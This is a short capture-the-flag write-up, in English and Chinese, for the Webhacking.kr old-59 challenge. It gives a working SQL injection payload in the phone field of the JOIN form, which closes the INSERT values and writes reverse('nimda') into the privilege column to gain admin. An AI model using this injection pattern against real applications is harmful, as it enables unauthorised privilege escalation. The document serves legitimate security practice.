Webhacking.kr old-59

Challenge

Create an account whose privilege field becomes admin.

通过 SQL injection 将新账号的权限字段变成 admin。

1
https://webhacking.kr/challenge/web-36/

Analysis

JOIN 查询把输入直接拼接为:

1
insert into chall59 values('{id}',{phone},'guest')

id 不能包含 admin,phone 仍可调用 reverse。把 id 设为 nimda,并令 phone 的表达式闭合原有值后写入 reverse(id),第三列即可得到 admin;末尾的 SQL 注释会截断固定的 guest。

Solution

JOIN 表单:

1
2
id=nimda
phone=1,reverse(id))--%20

LOGIN 表单:

1
2
lid=nimda
lphone=1

成功登录后页面显示 id : nimda、lv : admin。